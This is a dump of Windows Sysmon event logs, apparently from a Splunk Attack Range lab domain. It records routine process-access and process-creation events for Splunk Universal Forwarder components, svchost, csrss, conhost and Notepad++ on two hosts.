07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081527Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081526Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081525Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B284-615A-4A01-00000000FD01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081524Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B284-615A-4A01-00000000FD01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081523Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-B284-615A-4A01-00000000FD01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103688Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:33.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AA0CC7BD76CD504C2009CAFABAD76C1,SHA256=9EEB1C0F0A94D8BF91191ADFA195639506FD8532468461E286C054B725F4EFD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081553Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.354{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4ACA3B5E43C719BB3EF6B7A325EAE94,SHA256=EB075B93DA242C546E6A7FCA97F00F0949A1C6502EDC4BC6F5A21B8065CA817A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103687Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:33.860{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103686Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:33.860{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081552Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B285-615A-4B01-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081551Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081550Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081549Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081548Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081547Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081546Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081545Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081544Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081543Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081542Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B285-615A-4B01-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081541Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.151{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B285-615A-4B01-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081540Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.152{2FDD8D40-B285-615A-4B01-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000081569Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.932{2FDD8D40-B286-615A-4C01-00000000FD01}32282648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081568Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B286-615A-4C01-00000000FD01}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081567Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081566Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081565Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081564Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 